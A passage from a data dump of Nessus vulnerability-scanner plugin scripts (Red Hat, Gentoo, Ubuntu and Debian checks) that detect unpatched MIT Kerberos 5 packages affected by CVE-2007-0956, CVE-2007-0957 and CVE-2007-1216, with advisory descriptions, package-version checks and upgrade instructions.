value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_bugtraq_id(23281, 23282, 23285);\n script_xref(name:\"RHSA\", value:\"2007:0095\");\n\n script_name(english:\"RHEL 2.1 / 3 / 4 / 5 : krb5 (RHSA-2007:0095)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated krb5 packages that fix a number of issues are now available.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nKerberos is a network authentication system which allows clients and\nservers to authenticate to each other through use of symmetric\nencryption and a trusted third party, the KDC.\n\nA flaw was found in the username handling of the MIT krb5 telnet\ndaemon (telnetd). A remote attacker who can access the telnet port of\na target machine could log in as root without requiring a password.\n(CVE-2007-0956)\n\nNote that the krb5 telnet daemon is not enabled by default in any\nversion of Red Hat Enterprise Linux. In addition, the default firewall\nrules block remote access to the telnet port. This flaw does not\naffect the telnet daemon distributed in the telnet-server package.\n\nFor users who have enabled the krb5 telnet daemon and have it\naccessible remotely, this update should be applied immediately.\n\nWhilst we are not aware at this time that the flaw is being actively\nexploited, we have confirmed that the flaw is very easily exploitable.\n\nThis update also fixes two additional security issues :\n\nBuffer overflows were found which affect the Kerberos KDC and the\nkadmin server daemon. A remote attacker who can access the KDC could\nexploit this bug to run arbitrary code with the privileges of the KDC\nor kadmin server processes. (CVE-2007-0957)\n\nA double-free flaw was found in the GSSAPI library used by the kadmin\nserver daemon. Red Hat Enterprise Linux 4 and 5 contain checks within\nglibc that detect double-free flaws. Therefore, on Red Hat Enterprise\nLinux 4 and 5 successful exploitation of this issue can only lead to a\ndenial of service. Applications which use this library in earlier\nreleases of Red Hat Enterprise Linux may also be affected.\n(CVE-2007-1216)\n\nAll users are advised to update to these erratum packages which\ncontain a backported fix to correct these issues.\n\nRed Hat would like to thank MIT and iDefense for reporting these\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0957\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0095\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(2\\.1|3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1 / 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0095\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"krb5-devel-1.2.2-44\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"krb5-libs-1.2.2-44\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"krb5-server-1.2.2-44\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"krb5-workstation-1.2.2-44\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"krb5-devel-1.2.7-61\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"krb5-libs-1.2.7-61\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"krb5-server-1.2.7-61\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"krb5-workstation-1.2.7-61\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"krb5-devel-1.3.4-46\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"krb5-libs-1.3.4-46\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"krb5-server-1.3.4-46\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"krb5-workstation-1.3.4-46\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"krb5-devel-1.5-23\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"krb5-libs-1.5-23\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"krb5-server-1.5-23\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"krb5-server-1.5-23\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"krb5-server-1.5-23\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"krb5-workstation-1.5-23\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"krb5-workstation-1.5-23\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"krb5-workstation-1.5-23\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-devel / krb5-libs / krb5-server / krb5-workstation\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:59:03", "description": "The remote host is affected by the vulnerability described in GLSA-200704-02 (MIT Kerberos 5: Arbitrary remote code execution)\n\n The Kerberos telnet daemon fails to properly handle usernames allowing unauthorized access to any account (CVE-2007-0956). The Kerberos administration daemon, the KDC and possibly other applications using the MIT Kerberos libraries are vulnerable to the following issues. The krb5_klog_syslog function from the kadm5 library fails to properly validate input leading to a stack overflow (CVE-2007-0957). The GSS-API library is vulnerable to a double-free attack (CVE-2007-1216).\n Impact :\n\n By exploiting the telnet vulnerability a remote attacker may obtain access with root privileges. The remaining vulnerabilities may allow an authenticated remote attacker to execute arbitrary code with root privileges.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2007-04-05T00:00:00", "type": "nessus", "title": "GLSA-200704-02 : MIT Kerberos 5: Arbitrary remote code execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:mit-krb5", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200704-02.NASL", "href": "https://www.tenable.com/plugins/nessus/24935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200704-02.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24935);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_xref(name:\"GLSA\", value:\"200704-02\");\n\n script_name(english:\"GLSA-200704-02 : MIT Kerberos 5: Arbitrary remote code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200704-02\n(MIT Kerberos 5: Arbitrary remote code execution)\n\n The Kerberos telnet daemon fails to properly handle usernames allowing\n unauthorized access to any account (CVE-2007-0956). The Kerberos\n administration daemon, the KDC and possibly other applications using\n the MIT Kerberos libraries are vulnerable to the following issues. The\n krb5_klog_syslog function from the kadm5 library fails to properly\n validate input leading to a stack overflow (CVE-2007-0957). The GSS-API\n library is vulnerable to a double-free attack (CVE-2007-1216).\n \nImpact :\n\n By exploiting the telnet vulnerability a remote attacker may obtain\n access with root privileges. The remaining vulnerabilities may allow an\n authenticated remote attacker to execute arbitrary code with root\n privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200704-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All MIT Kerberos 5 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-crypt/mit-krb5-1.5.2-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mit-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-crypt/mit-krb5\", unaffected:make_list(\"ge 1.5.2-r1\"), vulnerable:make_list(\"lt 1.5.2-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MIT Kerberos 5\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:42", "description": "The krb5 telnet service did not appropriately verify user names. A remote attacker could log in as the root user by requesting a specially crafted user name. (CVE-2007-0956)\n\nThe krb5 syslog library did not correctly verify the size of log messages. A remote attacker could send a specially crafted message and execute arbitrary code with root privileges. (CVE-2007-0957)\n\nThe krb5 administration service was vulnerable to a double-free in the GSS RPC library. A remote attacker could send a specially crafted request and execute arbitrary code with root privileges.\n(CVE-2007-1216).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2007-11-10T00:00:00", "type": "nessus", "title": "Ubuntu 5.10 / 6.06 LTS / 6.10 : krb5 vulnerabilities (USN-449-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:krb5-admin-server", "p-cpe:/a:canonical:ubuntu_linux:krb5-clients", "p-cpe:/a:canonical:ubuntu_linux:krb5-doc", "p-cpe:/a:canonical:ubuntu_linux:krb5-ftpd", "p-cpe:/a:canonical:ubuntu_linux:krb5-kdc", "p-cpe:/a:canonical:ubuntu_linux:krb5-rsh-server", "p-cpe:/a:canonical:ubuntu_linux:krb5-telnetd", "p-cpe:/a:canonical:ubuntu_linux:krb5-user", "p-cpe:/a:canonical:ubuntu_linux:libkadm55", "p-cpe:/a:canonical:ubuntu_linux:libkrb5-dbg", "p-cpe:/a:canonical:ubuntu_linux:libkrb5-dev", "p-cpe:/a:canonical:ubuntu_linux:libkrb53", "cpe:/o:canonical:ubuntu_linux:5.10", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", "cpe:/o:canonical:ubuntu_linux:6.10"], "id": "UBUNTU_USN-449-1.NASL", "href": "https://www.tenable.com/plugins/nessus/28046", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-449-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(28046);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_xref(name:\"USN\", value:\"449-1\");\n\n script_name(english:\"Ubuntu 5.10 / 6.06 LTS / 6.10 : krb5 vulnerabilities (USN-449-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The krb5 telnet service did not appropriately verify user names. A\nremote attacker could log in as the root user by requesting a\nspecially crafted user name. (CVE-2007-0956)\n\nThe krb5 syslog library did not correctly verify the size of log\nmessages. A remote attacker could send a specially crafted message and\nexecute arbitrary code with root privileges. (CVE-2007-0957)\n\nThe krb5 administration service was vulnerable to a double-free in the\nGSS RPC library. A remote attacker could send a specially crafted\nrequest and execute arbitrary code with root privileges.\n(CVE-2007-1216).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/449-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-admin-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-ftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-kdc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-rsh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-telnetd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkadm55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkrb5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkrb5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkrb53\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.10|6\\.06|6\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.10 / 6.06 / 6.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-admin-server\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-clients\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-doc\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-ftpd\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-kdc\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-rsh-server\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-telnetd\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"krb5-user\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libkadm55\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libkrb5-dev\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libkrb53\", pkgver:\"1.3.6-4ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-admin-server\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-clients\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-doc\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-ftpd\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-kdc\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-rsh-server\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-telnetd\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"krb5-user\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libkadm55\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libkrb5-dev\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libkrb53\", pkgver:\"1.4.3-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-admin-server\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-clients\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-doc\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-ftpd\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-kdc\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-rsh-server\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-telnetd\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"krb5-user\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libkadm55\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libkrb5-dbg\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libkrb5-dev\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libkrb53\", pkgver:\"1.4.3-9ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-admin-server / krb5-clients / krb5-doc / krb5-ftpd / krb5-kdc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:59:06", "description": "Several remote vulnerabilities have been discovered in the MIT reference implementation of the Kerberos network authentication protocol suite, which may lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2007-0956 It was discovered that the krb5 telnet daemon performs insufficient validation of usernames, which might allow unauthorized logins or privilege escalation.\n\n - CVE-2007-0957 iDefense discovered that a buffer overflow in the logging code of the KDC and the administration daemon might lead to arbitrary code execution.\n\n - CVE-2007-1216 It was discovered that a double free in the RPCSEC_GSS part of the GSS library code might lead to arbitrary code execution.", "cvss3": {}, "published": "2007-04-10T00:00:00", "type": "nessus", "title": "Debian DSA-1276-1 : krb5 - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:krb5", "cpe:/o:debian:debian_linux:3.1", "cpe:/o:debian:debian_linux:4.0"], "id": "DEBIAN_DSA-1276.NASL", "href": "https://www.tenable.com/plugins/nessus/25010", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1276. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(25010);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_xref(name:\"DSA\", value:\"1276\");\n\n script_name(english:\"Debian DSA-1276-1 : krb5 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in the MIT\nreference implementation of the Kerberos network authentication\nprotocol suite, which may lead to the execution of arbitrary code. The\nCommon Vulnerabilities and Exposures project identifies the following\nproblems :\n\n - CVE-2007-0956\n It was discovered that the krb5 telnet daemon performs\n insufficient validation of usernames, which might allow\n unauthorized logins or privilege escalation.\n\n - CVE-2007-0957\n iDefense discovered that a buffer overflow in the\n logging code of the KDC and the administration daemon\n might lead to arbitrary code execution.\n\n - CVE-2007-1216\n It was discovered that a double free in the RPCSEC_GSS\n part of the GSS library code might lead to arbitrary\n code execution.\"\n );\n script_set_attribute(\n 